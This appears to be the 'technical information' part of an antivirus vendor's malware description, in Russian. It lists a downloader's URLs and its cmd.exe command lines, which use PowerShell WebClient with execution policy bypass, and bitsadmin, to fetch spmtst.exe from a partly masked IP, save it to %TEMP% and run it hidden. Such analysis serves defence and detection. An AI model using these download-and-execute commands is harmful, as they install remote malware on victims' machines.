Техническая информация
- http://21#.#.117.10/spmtst.exe как %temp%\585993.exe
- http://21#.#.117.10/spmtst.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://21#.#.117.10/spmtst.exe','%TEMP%\585993.exe');Start-Process '%TEMP%\585993.exe'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer windows /download /priority high http://21#.#.117.10/spmtst.exe %TEMP%\6494949.exe&start %TEMP%\6494949.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://21#.#.117.10/spmtst.exe','%TEMP%\585993.exe');Start-Process '%TEMP%\585993.exe'
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer windows /download /priority high http://21#.#.117.10/spmtst.exe %TEMP%\6494949.exe&start %TEMP%\6494949.exe
- '<SYSTEM32>\bitsadmin.exe' /transfer windows /download /priority high http://21#.#.117.10/spmtst.exe %TEMP%\6494949.exe